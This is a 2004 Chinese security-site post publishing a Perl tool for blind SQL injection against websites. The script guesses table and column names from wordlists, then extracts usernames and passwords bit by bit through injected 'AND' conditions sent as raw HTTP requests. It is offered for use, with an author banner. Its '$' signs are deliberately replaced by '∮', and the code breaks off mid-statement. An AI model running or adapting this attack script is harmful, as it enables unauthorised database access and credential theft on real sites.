频道栏目
首页 > 安全 > 网站安全 > 正文

PERL:多线程+中文破解SQL注入猜解机

2004-10-17 20:55:40           
收藏   我要投稿

说明:注意请把代码内的所有的∮都替换为$.


#!/usr/local/ActivePerl-5.8/bin/perl -w

use IO::Socket;
use threads;
#函数列表;
sub gethost
{
      if(∮url=~/(http://)?(.+?)/(.+)/)
      {
              ∮host=∮2;
              ∮path=/.∮3;
              if(∮host=~/(.*):(.*)/)
              {
                      ∮host=∮1;
                      ∮port=∮2;
              }
      }
}
sub fieInput
{
      my ∮field;
      open (fieInput,"∮_[0]") or die "cant open file! ";
      while (chomp(my ∮input=<fieInput>))
      {
              my ∮sql="exists%20(select%20∮input%20from%20∮table_user)";
              ∮path1 = "%20AND%20∮sql";
              my @res = &connect;
              if ("@res"=~/∮info/)
              {
                      ∮field=∮input;
                      print " +--  ∮field  --+";
                      last;
              }
      }
      close(fieInput);
      return ∮field;
}

sub tabInput
{
      my ∮table;
      open (tabInput,"∮_[0]") or die "cant open file! ";
      while (chomp(my ∮input=<tabInput>))
      {
              my ∮sql="0<>(select%20count(*)%20from%20∮input)";
              ∮path1 = "%20AND%20∮sql";
              my @res = &connect;
              if ("@res"=~/∮info/)
              {
                      ∮table=∮input;
                      print " +--  ∮table  --+ ";
                      last;
              }
      }
      close(tabInput);
      return ∮table;
}
sub connect
{
      ∮req = "GET ∮path∮path1 HTTP/1.0 ".
      "Host: ∮host ".
      "Referer: ∮host ".
      "Cookie: ";
      my ∮connection = IO::Socket::INET->new(Proto =>"tcp",
      PeerAddr =>∮host,
      PeerPort =>∮port) ││ die "Sorry! Could not connect to ∮host ";
      print ∮connection ∮req;
      my @res = <∮connection>;
      close ∮connection;
      return @res;
}
sub crack
{
my(@dic) = @_;
my ∮sql=pop(@dic);
my ∮i=0;
my ∮op=1;
my ∮crack;
foreach my ∮pass(@dic)
{
      print ">";
      ∮i++;
      ∮crack+=∮op*∮pass;
      ∮path1 = "%20AND%20∮crack<(∮sql)";
      my @res = &connect;
      if ("@res" =~ /∮info/)
      {
              ∮op=1;
              if(∮i==@dic)
              {
                      ∮crack++;
              }
      }
      else
      {
              ∮op=-1;
      }
}
return ∮crack;
}
sub asc
{
      my ∮asc=∮_[0];
      my ∮str;
      if (∮asc<256)
            {
            ∮str = pack(C*,∮asc);
            }
      else
      {
      ∮asc*=-1;
      ∮str = sprintf("%X",∮asc);
      if (∮str=~/(.{4})∮/i)
      {
              ∮str=∮1;
      }
      ∮str = pack("H*",∮str);
      }
      return ∮str;
}
#初始化变量;
∮url=;
∮host=;
∮path=;
∮info=;
∮port=80;
@dic1=(128,64,32,16,8,4,2,1);
@dic2=(16,8,4,2,1);
@dic3=(64,32,16,8,4,2,1);
@dic4=(16384,8192,4096,2048,1024,512,256,128,64,32,16,8,4,2,1);

print " ";
print " * The script Crack user&pass for Sql-injection system * ";
print " * hemon @ East China Jiaotong Univercity , 2004.5 * ";
print " * E-mail : the108one @ yahoo.com.cn    QQ :24303484 * ";

#取得主机地址、路径;
∮ARGC = @ARGV;
∮url = ∮ARGV[0];
∮info = ∮ARGV[1];
if (∮ARGC != 2)
{
print " * Please input the url : * ";
chomp(∮url=<STDIN>);
print " * Please input the infomation : * ";
chomp(∮info=<STDIN>);
}
&gethost;
print " 开始在 ∮hos

相关TAG标签 线程 中文 解机
上一篇:SQL注入葵花宝典(基础篇)
下一篇:SQL注入天书 - ASP注入漏洞全接触
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站